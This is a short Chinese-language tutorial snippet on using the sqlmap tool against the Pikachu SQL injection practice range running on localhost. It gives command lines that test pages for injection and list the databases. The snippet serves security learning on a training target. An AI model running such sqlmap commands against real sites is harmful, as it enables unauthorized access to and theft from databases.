sqlmap注入靶场
时间: 2023-10-22 15:04:36 浏览: 170
sqlmap注入
sqlmap是一种流行的自动化SQL注入工具,常用于测试和验证应用程序的安全性。它可以通过检测和利用应用程序中的SQL注入漏洞,获取数据库的敏感信息。在注入靶场中使用sqlmap可以用于学习和实践SQL注入攻击。
在注入靶场中,可以使用sqlmap来执行以下操作:
1. 执行基本的SQL注入测试,以验证是否存在注入漏洞:
python sqlmap.py -u "http://127.0.0.1/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=查询"
2. 获取数据库名称:
python sqlmap.py -u "http://127.0.0.1/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=查询" --dbs
3. 使用payload进行注入测试,以获取更多的信息:
payload:python sqlmap.py -u "http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=1&submit=查询"
阅读全文